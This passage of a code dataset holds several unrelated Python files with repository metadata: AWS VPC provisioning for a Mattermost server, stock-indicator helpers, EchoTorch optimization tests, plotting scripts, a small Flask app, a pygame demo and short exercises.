vpc.wait_until_exists()\n vpc.wait_until_available()\n vpc.enableDnsSupport = True\n vpc.enableDnsHostnames = True\n return vpc\n\n def _getTopLevelObjects() -> tuple[InternetGateway,VpcAddress,KeyPair]:\n return \\\n InternetGateways.getInternetGateway(name='Project 1 Internet Gateway'), \\\n VpcAddresses.allocateAddress(name=\"Project 1 Elastic IP\"), \\\n KeyPairs.getKeyPair(name='glkey')\n\n def _getSubnets(vpc: Vpc) -> tuple[Subnet, Subnet]:\n return \\\n vpc.getSubnet(\n name = 'Public Subnet', \n cidr_block = '10.0.1.0/24', \n availability_zone = Configuration.region_name + \"a\"), \\\n vpc.getSubnet(\n name = 'Private Subnet', \n cidr_block = '10.0.2.0/24', \n availability_zone = Configuration.region_name + \"b\")\n\n def _getRouteTables(vpc: Vpc) -> tuple[RouteTable,RouteTable]:\n return \\\n vpc.getRouteTable(name='Public Route Table'), \\\n vpc.getRouteTable(name='Private Route Table')\n\n def _getSecurityGroups(vpc: Vpc) -> tuple[SecurityGroup, SecurityGroup]:\n return \\\n vpc.getSecurityGroup(name='Project 1 Mattermost Security Group', description=\"Opens SSH, HTTP, HTTPS, Mattermost ports from the internet\"), \\\n vpc.getSecurityGroup(name='Project 1 MySQL Server', description=\"Opens SSH, HTTP, HTTPs, MySQL ports from the public subnet\")\n\n def _getNatGateway(vpc: Vpc, igw: InternetGateway, eipalloc: VpcAddress, subnet: Subnet) -> NatGateway:\n igw.wait_until_gateway_exists()\n igw.attachInternetGateway(vpc)\n natgateway = NatGateways.getNatGateway(eipalloc=eipalloc, subnet=subnet, name='Project 1 NAT Gateway')\n natgateway.wait_until_available()\n return natgateway\n\n def _getInstances(\n vpc: Vpc, \n keypair: KeyPair, \n private_subnet: Subnet, \n public_subnet: Subnet, \n private_sg: SecurityGroup, \n public_sg: SecurityGroup\n ) -> tuple[Instance, Instance]:\n keypair.wait_until_exists()\n private_subnet.wait_until_available()\n private_sg.wait_until_exists()\n mysql_server = vpc.runInstance(\n name = 'Project 1 MySQL Server', \n keypair = keypair, \n subnet = private_subnet, \n sg = private_sg, \n ami_id = Configuration.matterMost_ami_id,\n root_volume_device_name = Configuration.matterMost_root_volume_device_name,\n type = Configuration.matterMost_instance_type, \n ebs_volume_size = Configuration.matterMost_ebs_volume_size,\n bootstrap_file = './bootstrap/mysql-server-centos.sh')\n mysql_server.wait_for_status_ok()\n\n bootstrap_str = ''\n with open('./bootstrap/mattermost-centos.sh') as f: \n bootstrap_str = f.read().format(mysql_server.private_ip_address)\n\n public_subnet.wait_until_available()\n public_subnet.map_public_ip_on_launch = True\n public_sg.wait_until_exists()\n mattermost_server = vpc.runInstance(\n name = 'Project 1 Mattermost Server', \n keypair = keypair, \n subnet = public_subnet, \n sg = public_sg, \n ami_id = Configuration.matterMost_ami_id,\n root_volume_device_name = Configuration.matterMost_root_volume_device_name,\n type = Configuration.matterMost_instance_type, \n ebs_volume_size = Configuration.matterMost_ebs_volume_size,\n bootstrap_str = bootstrap_str)\n \n return mysql_server, mattermost_server\n \n def _wire_everything_up(\n igw: InternetGateway,\n public_rtb: RouteTable, \n private_rtb: RouteTable, \n public_subnet: Subnet, \n private_subnet: Subnet,\n public_sg: SecurityGroup, \n private_sg: SecurityGroup, \n nat_gateway: NatGateway):\n public_sg.authorizeIngress(from_port=22, protocol='tcp', cidr_block='0.0.0.0/0', name='open-ssh-public', description='Opening SSH from the internet', to_port=22)\n public_sg.authorizeIngress(from_port=443, protocol='tcp', cidr_block='0.0.0.0/0', name='open-https-public', description='Opening HTTPS from the internet', to_port=443)\n public_sg.authorizeIngress(from_port=80, protocol='tcp', cidr_block='0.0.0.0/0', name='open-http-public', description='Opening HTTP from the internet', to_port=80)\n public_sg.authorizeIngress(from_port=8065, protocol='tcp', cidr_block='0.0.0.0/0', name='open-mattermost-public', description='Opening Mattermost from the internet', to_port=8065)\n private_sg.authorizeIngress(from_port=22, protocol='tcp', cidr_block='10.0.1.0/24', name='open-ssh-private', description='Opening SSH from the public subnet', to_port=22)\n private_sg.authorizeIngress(from_port=80, protocol='tcp', cidr_block='10.0.1.0/24', name='open-http-private', description='Opening HTTP from the public subnet', to_port=80)\n private_sg.authorizeIngress(from_port=443, protocol='tcp', cidr_block='10.0.1.0/24', name='open-https-private', description='Opening HTTPS from the public subnet', to_port=443)\n private_sg.authorizeIngress(from_port=3306, protocol='tcp', cidr_block='10.0.1.0/24', name='open-mysql-private', description='Opening MySQL from the public subnet', to_port=3306)\n public_rtb.addIgwRoute(igw, '0.0.0.0/0')\n public_rtb.associate_with_subnet(public_subnet)\n private_rtb.addNatRoute(nat_gateway, '0.0.0.0/0')\n private_rtb.associate_with_subnet(private_subnet)\n\n def _wait_for_status_ok(instances):\n [instance.wait_for_status_ok() for instance in instances]\n\n def run():\n vpc = CreateAWSResources._getVpc()\n igw, eipalloc, keypair = CreateAWSResources._getTopLevelObjects()\n public_subnet, private_subnet = CreateAWSResources._getSubnets(vpc=vpc)\n public_rtb, private_rtb = CreateAWSResources._getRouteTables(vpc=vpc)\n public_sg, private_sg = CreateAWSResources._getSecurityGroups(vpc=vpc) \n nat_gateway = CreateAWSResources._getNatGateway(vpc=vpc, igw=igw, eipalloc=eipalloc, subnet=public_subnet)\n mysql_server, mattermost_server = CreateAWSResources._getInstances(\n vpc=vpc, \n keypair=keypair, \n private_subnet=private_subnet, \n public_subnet=public_subnet, \n private_sg=private_sg, \n public_sg=public_sg)\n CreateAWSResources._wire_everything_up(\n igw=igw, \n public_rtb=public_rtb, \n private_rtb=private_rtb,\n public_subnet=public_subnet, \n private_subnet=private_subnet,\n public_sg=public_sg, \n private_sg=private_sg, \n nat_gateway=nat_gateway\n )\n\n CreateAWSResources._wait_for_status_ok([mysql_server, mattermost_server])\n\n logging.info(f'''\n\n Open web broswer to {mattermost_server.public_ip_address}:8065. \n\n ''')","repo_name":"tomdemay/glcloud","sub_path":"projects/week4/option2/create_aws_resources.py","file_name":"create_aws_resources.py","file_ext":"py","file_size_in_byte":8437,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"42954779399","text":"import datetime\n\nimport akshare as ak\nimport numpy as np\n\n\ndef attribute_history(security, count, unit='1d', fields=None, skip_paused=True, df=True, fq='qfq'):\n \"\"\"\n 获取股票历史行情数据\n :return: pandas.DataFrame\n \"\"\"\n # 将unit参数转换为pandas的时间频率字符串\n freq_map = {'1d': 'D', '1w': 'W', '1M': 'M'}\n freq = freq_map[unit]\n # 获取当前时间\n end_date = datetime.datetime.now()\n # 计算开始时间\n if unit == '1d':\n start_date = end_date - datetime.timedelta(days=count)\n elif unit == '1w':\n start_date = end_date - datetime.timedelta(weeks=count)\n elif unit == '1M':\n start_date = end_date - datetime.timedelta(months=count)\n # 获取股票历史行情数据\n print(start_date.strftime('%Y-%m-%d'), end_date.strftime('%Y-%m-%d'))\n data = ak.stock_zh_a_daily(symbol=security, start_date=start_date.strftime('%Y-%m-%d'),\n end_date=end_date.strftime('%Y-%m-%d'), adjust=fq)\n # 将日期作为索引\n data = data.set_index('date')\n # 将数据按照时间频率进行重采样\n data = data.resample(freq).last()\n # 如果skip_paused为True,则跳过停牌的日期\n if skip_paused:\n paused_dates = data[data['volume'] == 0].index\n data = data.drop(paused_dates)\n # 返回指定的字段数据\n result = data[list(fields)]\n return result\n\n\ndef attribute_history_etf(security, count, unit='1d', fields=None, skip_paused=True, df=True, fq='qfq'):\n \"\"\"\n 获取股票历史行情数据\n :return: pandas.DataFrame\n \"\"\"\n # 根据count和uint计算需要的数据量\n real_count = 0\n if unit == '1d':\n real_count = count * 1\n elif unit == '1w':\n real_count = count * 5\n elif unit == '1M':\n real_count = count * 21\n\n # 获取股票历史行情数据\n data = ak.fund_etf_hist_sina(symbol=security)\n # data.sort_values(by='date', ascending=False, inplace=True)\n last = data.tail(real_count)\n last = last[list(fields)]\n last = last.rename(index={x: x - last.index[0] for x in last.index})\n return last\n\n\ndef get_current_data(security):\n \"\"\"\n 获取当前的股票数据\n :return:\n \"\"\"\n df = ak.fund_etf_category_sina(symbol='ETF基金')\n df = df.rename(columns={'代码': 'security', '最新价': 'last_price'})\n result = df.loc[df['security'] == security]\n return result\n\n\n# 计算威廉指标\ndef get_william(security, n=14):\n data = attribute_history_etf(security, n, unit='1d', fields=['date', 'high', 'low', 'close'])\n # print(data)\n high = data.high.values\n # print(high)\n low = data.low.values\n # print(low)\n # 计算high和low的最大值和最小值\n high_max = np.max(high)\n low_min = np.min(low)\n # print(high_max)\n # print(low_min)\n # 计算威廉指标\n william = 100 * (high_max - data.close.values[-1]) / (high_max - low_min)\n # print(william)\n # (4132.295 - 4100.148) / (4132.295 - 3983.896)\n return william\n\n\nif __name__ == '__main__':\n # data = attribute_history_etf('sh510300', 5, unit='1d', fields=['date', 'open', 'high', 'low', 'close', 'volume'])\n # print(data)\n # print(data.close.values[-1])\n # adr = 100 * (data.close.values[-1] - data.close.values[-2]) / data.close.values[-2]\n # print(adr)\n # data = get_current_data('sh510300').last_price.values[0]\n # print(data)\n wr1 = get_william('sh000300', 14)\n # wr2 = get_william('sh000300', 21)\n # print(f'WR1: {wr1}, WR2: {wr2}')\n","repo_name":"MagiCiAn1/MagicTrader","sub_path":"data/akshare_data.py","file_name":"akshare_data.py","file_ext":"py","file_size_in_byte":3536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"40428239851","text":"import pytest\n\n\n@pytest.mark.parametrize(\"name, status_code\", [(\"Choco\", 201), (\"Test\", 422)])\n@pytest.mark.django_db\ndef test_save_choco(client, name, status_code):\n data = {\n \"name\": name,\n \"description\": \"test address\",\n \"price\": 100\n }\n response = client.post(\"/chocolate/create/\", data=data)\n assert response.status_code == status_code\n","repo_name":"skypro-008/lesson31-and-tests","sub_path":"solution/my_project_part_2/name_template/template_test.py","file_name":"template_test.py","file_ext":"py","file_size_in_byte":374,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"17267571282","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nSpyder Editor\r\n\r\nThis is a temporary script file.\r\n\"\"\"\r\n\r\n\r\n#Import what I need\r\nimport random\r\nimport matplotlib.pyplot as plt\r\nfrom math import log, e, ceil, floor,sqrt,pi,exp\r\nimport numpy as np\r\nfrom numpy import arange,array, empty\r\nimport pdb\r\nfrom random import randint\r\nimport copy\r\nfrom operator import add \r\nimport scipy\r\nfrom scipy.optimize import curve_fit\r\nimport numpy as np\r\n\r\n\r\n\r\ndef walk(n):\r\n\r\n time = 0 \r\n i = 0 \r\n while i < n:\r\n if i == 0: \r\n r = random.random() \r\n t = -log(1-r,e) \r\n time = time+t \r\n i=i+1\r\n \r\n elif i !=0 and i!=n-1 : \r\n r_2 = random.random()\r\n t_2 = -log(1-r_2,e)\r\n time = time+t_2\r\n \r\n R = random.random() \r\n if 0 <= R < 0.5: \r\n i = i -1 \r\n elif 0.5 <= R <=1:\r\n i=i+1 \r\n else: \r\n i = n\r\n return time\r\n\r\n\r\n\r\ndef many_walks(n,m):\r\n v_t = [] \r\n for i in range(m):\r\n w = walk(n)\r\n v_t.append(w)\r\n \r\n return v_t \r\n# So up till here, I managed to generate the vector that I want, i.e. v_t \r\nn = 20\r\nm = 2000 \r\nbins = [10*i for i in range(2000)] \r\nnumpy_hist = plt.figure() \r\nplt.hist(many_walks(n,m), bins)\r\n# Up till here, I have basically plotted a histogram using the vector v_t. (on python, the histogram comes out so it should be correct)\r\ndef func(x,s):\r\n x = np.array(x)\r\n return (4/(x*np.sqrt(np.pi*n*s)))*np.exp(-(np.log(x)**2)/(2*n*s))\r\n#Up until here I defined the function func, this is the function that I want to fit on my histogram. Notice that there is also a parameter n\r\n# this n is exactly the same n that we have in walks(n) and many_walks(n,m). But as you see I've specified n =20, so that should be fine I think.\r\n\r\nxx = np.linspace(0.1,2000,10000) # I made this in order to plot the function func but no idea if it will work tbh. After Here I got lost\r\n\r\n\r\n\r\n \r\npopt, pcov = curve_fit(func, bins, many_walks(n,m)) \r\n# I would like to use curve_fit to find s such that func fitts the curve\r\n'''\r\nx = np.linspace(0,2000,10000) \r\ny = func(x,*popt)\r\n'''\r\n","repo_name":"mce1g15/BioPython","sub_path":"temp.py","file_name":"temp.py","file_ext":"py","file_size_in_byte":2244,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"14469075417","text":"# coding=utf-8\nimport matplotlib.pyplot as plt\n\ndecisionNode = dict(boxstyle=\"sawtooth\", fc=\"0.8\")\nleafNode = dict(boxstyle=\"round4\", fc=\"0.8\")\narrow_args = dict(arrowstyle=\"<-\")\n\n\ndef plotNode(nodeTxt: str, centerPt: tuple, parentPt: tuple, nodeType: dict):\n '''\n 绘制节点\n :param nodeTxt: 节点文本\n :param centerPt: 箭头终点\n :param parentPt: 箭头起点\n :param nodeType: 节点类型\n :return:\n '''\n create_plot.ax1.annotate(nodeTxt, xy=parentPt, xycoords='axes fraction', xytext=centerPt,\n textcoords='axes fraction',\n va='center', ha=\"center\", bbox=nodeType, arrowprops=arrow_args)\n\n\ndef get_leaf_num(tree):\n '''\n 获取树的叶子节点数目\n :param tree:\n :return:\n '''\n leaf_num = 0\n first_str = list(tree.keys())[0]\n second_dict = tree[first_str]\n for k in second_dict.keys():\n k_ = second_dict[k]\n if type(k_).__name__ == 'dict':\n leaf_num += get_leaf_num(k_)\n else:\n leaf_num += 1\n return leaf_num\n\n\ndef get_tree_depth(tree):\n '''\n 获取树的深度\n :param tree:\n :return:\n '''\n max_depth = 0\n first_str = list(tree.keys())[0]\n second_dict = tree[first_str]\n for k in second_dict.keys():\n k_ = second_dict[k]\n if type(k_).__name__ == 'dict':\n this_depth = 1 + get_tree_depth(k_)\n else:\n this_depth = 1\n\n if this_depth > max_depth:\n max_depth = this_depth\n return max_depth\n\n\ndef plotTree(myTree, parentPt, nodeTxt):\n '''\n 绘制一棵树\n :param myTree:\n :param parentPt: 起点坐标\n :param nodeTxt: 文字说明\n :return:\n '''\n leaf_num = get_leaf_num(myTree)\n depth = get_tree_depth(myTree)\n first_str = list(myTree.keys())[0]\n # 树的中心起点\n center_pt = (plotTree.xOff + (1.0 + float(leaf_num)) / 2.0 / plotTree.totalW, plotTree.yOff)\n plotMidText(center_pt, parentPt, nodeTxt)\n plotNode(first_str, center_pt, parentPt, decisionNode)\n second_dict = myTree[first_str]\n plotTree.yOff -= 1.0 / plotTree.totalD\n for key in second_dict.keys():\n if type(second_dict[key]).__name__ == 'dict':\n plotTree(second_dict[key], center_pt, str(key))\n else:\n plotTree.xOff = plotTree.xOff + 1.0 / plotTree.totalW\n plotNode(second_dict[key], (plotTree.xOff, plotTree.yOff), center_pt, leafNode)\n plotMidText((plotTree.xOff, plotTree.yOff), center_pt, str(key))\n\n plotTree.yOff = plotTree.yOff + 1.0 / plotTree.totalD\n\n\ndef plotMidText(cntrPt, parentPt, txtString):\n '''\n 在父子节点中填充文本信息\n :param cntrPt:\n :param parentPt:\n :param txtString:\n :return:\n '''\n xMid = (parentPt[0] - cntrPt[0]) / 2.0 + cntrPt[0]\n yMid = (parentPt[1] - cntrPt[1]) / 2.0 + cntrPt[1]\n # 绘制一个文本\n create_plot.ax1.text(xMid, yMid, txtString)\n\n\ndef create_plot(intree):\n # 新图形\n fig = plt.figure(1, facecolor='white')\n # 清空绘图区\n fig.clf()\n axprops = dict(xticks=[], yticks=[])\n # 全局变量\n create_plot.ax1 = plt.subplot(111, frameon=False, **axprops)\n\n # 绘制节点\n # plotNode('a decision node', (0.5, 0.1), (0.1, 0.5), decisionNode)\n # 绘制节点\n # plotNode('a leaf node', (0.8, 0.1), (0.3, 0.8), leafNode)\n\n\n # 树的宽度\n plotTree.totalW = float(get_leaf_num(intree))\n # 树的深度\n plotTree.totalD = float(get_tree_depth(intree))\n\n plotTree.xUnit = 1/plotTree.totalW\n plotTree.yUnit = 1/plotTree.totalD\n\n # 初始化坐标偏移量\n plotTree.xOff = -0.5 / plotTree.totalW\n plotTree.yOff = 1.0\n\n parentPt = (0.5, 1.0)\n plotTree(intree, parentPt, '')\n plt.show()\n\n\nif __name__ == '__main__':\n import mlInAction.trees as tree\n ds, fea_names = tree.create_dataset()\n intree = tree.create_tree(ds, fea_names)\n intree['no surfacing'][3] = 'maybe'\n create_plot(intree)\n","repo_name":"zhengwei223/thinkstats","sub_path":"mlInAction/treeplotter.py","file_name":"treeplotter.py","file_ext":"py","file_size_in_byte":3999,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"11283502275","text":"#!/usr/bin/python3\nimport argparse\nimport glob\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom scipy.optimize import curve_fit\n\n\ndef get_wer(best_wer_file):\n with open(best_wer_file) as f_in:\n wer_line = f_in.read()\n return float(wer_line.split(' ')[1])\n\n\ndef trend_curve(x, a, b, c):\n return a * x ** 2 + b * x + c\n\n\ndef main():\n wers = []\n wers_best = []\n for num in range(500, 5500, 100):\n best_wer_file = '{}/decode/scoring_kaldi/best_wer'.format(num)\n wers.append((num, get_wer(best_wer_file)))\n if num in [2100, 2600, 3700]:\n wers_best.append((num, get_wer(best_wer_file)))\n\n X_labels, Y = map(list, zip(*wers))\n X_labels_best, Y_best = map(list, zip(*wers_best))\n\n N = len(wers)\n X = np.arange(N) # the x locations for the groups\n X_best = [X_labels.index(x_label) for x_label in X_labels_best]\n plt.plot(X, Y, 'bo', label='wyniki modeli')\n plt.plot(X_best, Y_best, 'ro', label='wyniki najlepszych modeli')\n\n popt, pcov = curve_fit(trend_curve, X, Y)\n xx = np.linspace(0, N, 1000)\n yy = trend_curve(xx, *popt)\n plt.plot(xx, yy, 'k--', label='linia trendu')\n\n plt.ylabel('WER [%]')\n plt.xlabel('Liczba rozkładów Gaussa')\n plt.xticks(X[::2], X_labels[::2], rotation='vertical')\n plt.legend()\n plt.show()\n\n\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"jfajkowski/asr-builder","sub_path":"local/plot/plot_mono_experiment.py","file_name":"plot_mono_experiment.py","file_ext":"py","file_size_in_byte":1371,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"24571405474","text":"from echotorch.datasets.NARMADataset import NARMADataset\nimport echotorch.utils.optimization as optim\nimport torch\nimport random\nfrom torch.autograd import Variable\nfrom torch.utils.data.dataloader import DataLoader\nimport echotorch.nn.reservoir as etrs\nimport echotorch.utils\nimport numpy as np\nfrom . import EchoTorchTestCase\n\n\n# Test cases : Hyper-parameters optimization\nclass Test_Hyperparameters_Optimization(EchoTorchTestCase):\n \"\"\"\n Hyper-parameters optimization\n \"\"\"\n\n # region PRIVATE\n\n # Function to test the ESN on the NARMA-10 task\n def _evaluation_NARMA10(self, parameters, datasets, n_samples=5):\n \"\"\"\n Test the ESN with specific parameters on NARMA-10\n :param parameters: Dictionary with parameters values\n :param datasets: The dataset for the evaluation\n :param n_samples: How many samples to test the model ?\n :return: A tuple (model, fitness value)\n \"\"\"\n # Batch size (how many sample processed at the same time?)\n batch_size = 1\n\n # Reservoir hyper-parameters\n spectral_radius = parameters['spectral_radius']\n leaky_rate = parameters['leaky_rate']\n input_dim = 1\n reservoir_size = parameters['reservoir_size']\n connectivity = parameters['connectivity']\n ridge_param = parameters['ridge_param']\n input_scaling = parameters['input_scaling']\n bias_scaling = parameters['bias_scaling']\n\n # Data loader\n trainloader = DataLoader(datasets[0], batch_size=batch_size, shuffle=False, num_workers=1)\n testloader = DataLoader(datasets[1], batch_size=batch_size, shuffle=False, num_workers=1)\n\n # Average NRMSE\n NRMSE_average = 0.0\n\n # For each samples\n for n in range(n_samples):\n # Internal matrix\n w_generator = echotorch.utils.matrix_generation.NormalMatrixGenerator(\n connectivity=connectivity,\n spetral_radius=spectral_radius\n )\n\n # Input weights\n win_generator = echotorch.utils.matrix_generation.NormalMatrixGenerator(\n connectivity=connectivity,\n scale=input_scaling,\n apply_spectral_radius=False\n )\n\n # Bias vector\n wbias_generator = echotorch.utils.matrix_generation.NormalMatrixGenerator(\n connectivity=connectivity,\n scale=bias_scaling,\n apply_spectral_radius=False\n )\n\n # Create a Leaky-integrated ESN,\n # with least-square training algo.\n # esn = etrs.ESN(\n esn = etrs.LiESN(\n input_dim=input_dim,\n hidden_dim=reservoir_size,\n output_dim=1,\n leaky_rate=leaky_rate,\n learning_algo='inv',\n w_generator=w_generator,\n win_generator=win_generator,\n wbias_generator=wbias_generator,\n ridge_param=ridge_param\n )\n\n # For each batch\n for data in trainloader:\n # Inputs and outputs\n inputs, targets = data\n\n # Transform data to Variables\n inputs, targets = Variable(inputs), Variable(targets)\n\n # ESN need inputs and targets\n esn(inputs, targets)\n # end for\n\n # Now we finalize the training by\n # computing the output matrix Wout.\n esn.finalize()\n\n # Get the first sample in test set,\n # and transform it to Variable.\n dataiter = iter(testloader)\n test_u, test_y = dataiter.next()\n test_u, test_y = Variable(test_u), Variable(test_y)\n\n # Make a prediction with our trained ESN\n y_predicted = esn(test_u)\n\n # Add to sum of NRMSE\n NRMSE_average += echotorch.utils.nrmse(y_predicted.data, test_y.data)\n # end for\n\n # Print test MSE and NRMSE\n return esn, NRMSE_average / n_samples\n # end evaluation_NARMA10\n\n # endregion PRIVATE\n\n # region TESTS\n\n # Test genetic optimization on NARMA-10\n def test_genetic_optimization_NARMA10(self):\n \"\"\"\n Test genetic optimization on NARMA-10\n \"\"\"\n # Debug ?\n debug = False\n\n # Length of training samples\n train_sample_length = 5000\n\n # Length of test samples\n test_sample_length = 1000\n\n # How many training/test samples\n n_train_samples = 1\n n_test_samples = 1\n\n # Manual seed initialisation\n echotorch.utils.random.manual_seed(1)\n\n # Get a random optimizer\n random_optimizer = optim.optimizer_factory.get_optimizer(\n 'genetic',\n iterations=2\n )\n\n # NARMA10 dataset\n narma10_train_dataset = NARMADataset(train_sample_length, n_train_samples, system_order=10)\n narma10_test_dataset = NARMADataset(test_sample_length, n_test_samples, system_order=10)\n\n # Parameters ranges\n param_ranges = dict()\n param_ranges['spectral_radius'] = np.linspace(0, 2.0, 1000)\n param_ranges['leaky_rate'] = np.linspace(0.1, 1.0, 1000)\n param_ranges['reservoir_size'] = np.arange(50, 510, 10)\n param_ranges['connectivity'] = np.linspace(0.1, 1.0, 1000)\n param_ranges['ridge_param'] = np.logspace(-10, 2, base=10, num=1000)\n param_ranges['input_scaling'] = np.linspace(0.1, 1.0, 1000)\n param_ranges['bias_scaling'] = np.linspace(0.0, 1.0, 1000)\n\n # Launch the optimization of hyper-parameter\n _, best_param, best_NRMSE = random_optimizer.optimize(\n self._evaluation_NARMA10,\n param_ranges,\n (narma10_train_dataset, narma10_test_dataset),\n n_samples=5\n )\n\n # Show the result\n if debug:\n print(\"Best hyper-parameters found : {}\".format(best_param))\n print(\"Best NRMSE : {}\".format(best_NRMSE))\n # end if\n\n # Test the NRMSE found with optimization\n self.assertLessEqual(\n best_NRMSE,\n 0.5,\n msg=\"NRMSE to high for genetic optimisation, check the implementation!\"\n )\n # end test_genetic_optimization_NARMA10\n\n # Test grid search optimization on NARMA10\n def test_grid_search_optimization_NARMA10(self):\n \"\"\"\n Test grid search optimization on NARMA10\n \"\"\"\n # Debug?\n debug = False\n\n # Length of training samples\n train_sample_length = 5000\n\n # Length of test samples\n test_sample_length = 1000\n\n # How many training/test samples\n n_train_samples = 1\n n_test_samples = 1\n\n # Manual seed initialisation\n echotorch.utils.random.manual_seed(1)\n\n # Get a random optimizer\n random_optimizer = optim.optimizer_factory.get_optimizer('grid-search')\n\n # NARMA10 dataset\n narma10_train_dataset = NARMADataset(train_sample_length, n_train_samples, system_order=10)\n narma10_test_dataset = NARMADataset(test_sample_length, n_test_samples, system_order=10)\n\n # Parameters ranges\n param_ranges = dict()\n param_ranges['spectral_radius'] = np.arange(0, 1.1, 0.5)\n param_ranges['leaky_rate'] = np.arange(0.1, 1.1, 0.5)\n param_ranges['reservoir_size'] = np.arange(100, 510, 200)\n param_ranges['connectivity'] = np.arange(0.1, 1.0, 0.4)\n param_ranges['ridge_param'] = np.logspace(-10, 2, base=10, num=2)\n param_ranges['input_scaling'] = np.arange(0.1, 1.1, 0.4)\n param_ranges['bias_scaling'] = np.arange(0.0, 1.1, 0.5)\n\n # Launch the optimization of hyper-parameters\n _, best_param, best_NRMSE = random_optimizer.optimize(\n self._evaluation_NARMA10,\n param_ranges,\n (narma10_train_dataset, narma10_test_dataset),\n n_samples=1\n )\n\n # Show the result\n if debug:\n print(\"Best hyper-parameters found : {}\".format(best_param))\n print(\"Best NRMSE : {}\".format(best_NRMSE))\n # end if\n\n # Test the NRMSE of the ESN found with optimization\n # self.assertAlmostEqual(best_NRMSE, 1.553938488748105, places=2)\n self.assertLessEqual(\n best_NRMSE,\n 1.6,\n msg=\"NRMSE to high for grid optimisation, check the implementation!\"\n )\n # end test_grid_search_optimization_NARMA10\n\n # Test random optimization on NARMA10\n def test_random_optimization_NARMA10(self):\n \"\"\"\n Test random optimization on NARMA10\n \"\"\"\n # Debug?\n debug = False\n\n # Length of training samples\n train_sample_length = 5000\n\n # Length of test samples\n test_sample_length = 1000\n\n # How many training/test samples\n n_train_samples = 1\n n_test_samples = 1\n\n # Manual seed initialisation\n echotorch.utils.random.manual_seed(1)\n\n # Get a random optimizer\n random_optimizer = optim.optimizer_factory.get_optimizer('random', R=50)\n\n # NARMA10 dataset\n narma10_train_dataset = NARMADataset(train_sample_length, n_train_samples, system_order=10)\n narma10_test_dataset = NARMADataset(test_sample_length, n_test_samples, system_order=10)\n\n # Parameters ranges\n param_ranges = dict()\n param_ranges['spectral_radius'] = np.arange(0, 1.1, 0.1)\n param_ranges['leaky_rate'] = np.arange(0.1, 1.1, 0.1)\n param_ranges['reservoir_size'] = np.arange(50, 500, 50)\n param_ranges['connectivity'] = np.arange(0.1, 1.0, 0.1)\n param_ranges['ridge_param'] = np.logspace(-10, 2, base=10, num=10)\n param_ranges['input_scaling'] = np.arange(0.1, 1.1, 0.1)\n param_ranges['bias_scaling'] = np.arange(0.0, 1.1, 0.1)\n\n # Launch the optimization of hyper-parameters\n _, best_param, best_NRMSE = random_optimizer.optimize(\n self._evaluation_NARMA10,\n param_ranges,\n (narma10_train_dataset, narma10_test_dataset),\n n_samples=5\n )\n\n # Show the result\n if debug:\n print(\"Best hyper-parameters found : {}\".format(best_param))\n print(\"Best NRMSE : {}\".format(best_NRMSE))\n # end if\n\n # Test the NRMSE of the ESN found with optimization\n # self.assertAlmostEqual(best_NRMSE, 0.49092315487463206, places=1)\n self.assertLessEqual(\n best_NRMSE,\n 0.5,\n msg=\"NRMSE to high for random optimisation, check the implementation!\"\n )\n # end test_random_optimization_NARMA10\n\n # endregion TESTS\n\n# end Test_Hyperparameters_Optimization\n","repo_name":"nschaetti/EchoTorch","sub_path":"test/test_hyperparameters_optimization.py","file_name":"test_hyperparameters_optimization.py","file_ext":"py","file_size_in_byte":10764,"program_lang":"python","lang":"en","doc_type":"code","stars":408,"dataset":"github-code","pt":"52"} +{"seq_id":"75228360164","text":"import click\nimport pickle\nfrom flask import Flask, render_template, request\n\napp = Flask(__name__)\nmodel = pickle.load(open('models/stacking.pkl', 'rb'))\n\n@app.route('/')\ndef home():\n return render_template('index.html')\n\n@app.route('/predict',methods=['POST'])\ndef predict():\n int_features = [float(x) for x in request.form.values()]\n final_features = [np.array(int_features)]\n prediction = model.predict(final_features)\n output = prediction #round(prediction[0], 2) \n return render_template('index.html', prediction_text='Genetic Disorder Label :{}'.format(output))\n\napp.run()\n\n\n","repo_name":"DimaRossikhin/MyFirstDataProject2","sub_path":"flask_docker/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":600,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"9776819649","text":"import pygame\n\npygame.init() # 초기화 (반드시 필요)\n\n# 화면 크기 설정\nscreen_width = 480 #가로크기\nscreen_height = 640 # 세로크기\nscreen = pygame.display.set_mode((screen_width, screen_height))\n\n# 화면 타이틀\npygame.display.set_caption(\"나도 게임\")\n\n# 배경이미지 불러오기\nbackground = pygame.image.load(\"D:/Workspaces/python_game/pygame_basic/background.png\")\n\n# 이벤트 루프\nrunning = True # 게임이 진행중?\n\nwhile running:\n for event in pygame.event.get(): # 어떤 이벤트가 발생하였는가?\n if event.type == pygame.QUIT: # 창이 닫히는 이벤트가 발생하였는가?\n running = False\n \n #screen.blit(background, (0, 0)) #배경 그리기\n screen.fill((0, 0, 255))\n \n pygame.display.update() # 게임화면을 다시 그리기!\n\n# pygame 종료\npygame.quit()","repo_name":"jajaec/study","sub_path":"python_game/pygame_basic/2_background.py","file_name":"2_background.py","file_ext":"py","file_size_in_byte":868,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"1818140100","text":"import math\n\ndef chk_devisor(num):\n limit = math.ceil(math.sqrt(num))\n result = set()\n for i in range(1, limit+1):\n q, r = divmod(num, i)\n if r == 0:\n result.add(q)\n result.add(i)\n if len(result) % 2 == 0:\n result = num\n else:\n result = -num\n return result\n\n\ndef solution(left, right):\n answer = 0\n for num in range(left, right+1):\n result = chk_devisor(num)\n answer += result\n return answer","repo_name":"LeeHyeonKyu/Coding-Practice","sub_path":"Programmers/월간 코드 챌린지 시즌2/약수의 개수와 덧셈.py","file_name":"약수의 개수와 덧셈.py","file_ext":"py","file_size_in_byte":482,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"7365861419","text":"import vapoursynth as 